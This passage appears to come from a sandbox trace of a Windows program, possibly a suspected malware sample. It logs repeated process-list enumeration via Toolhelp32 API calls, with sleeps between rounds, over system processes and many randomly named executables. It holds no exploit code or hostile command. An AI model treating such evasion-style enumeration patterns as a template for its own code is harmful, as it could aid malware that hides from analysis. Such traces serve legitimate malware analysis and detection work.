dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0129.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0129.761] CloseHandle (hObject=0xc4) returned 1 [0129.761] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0129.766] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0129.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0129.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0129.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0129.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0129.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0129.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0129.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0129.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0129.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0129.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0129.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0129.808] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.809] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.810] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0129.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0129.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0129.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0129.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0129.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0129.818] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0129.819] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0129.820] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0129.821] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0129.822] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0129.823] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0129.824] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0129.825] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0129.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0129.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0129.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0129.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0129.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0129.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0129.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0129.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0129.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0129.837] CloseHandle (hObject=0xbc) returned 1 [0129.837] Sleep (dwMilliseconds=0x12c) [0130.167] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0130.171] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.172] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0130.172] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0130.173] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0130.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0130.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0130.177] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0130.177] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0130.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.179] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.179] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.181] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0130.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.183] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0130.184] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.185] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.186] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0130.188] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0130.189] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0130.190] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.191] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0130.194] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0130.195] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0130.197] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 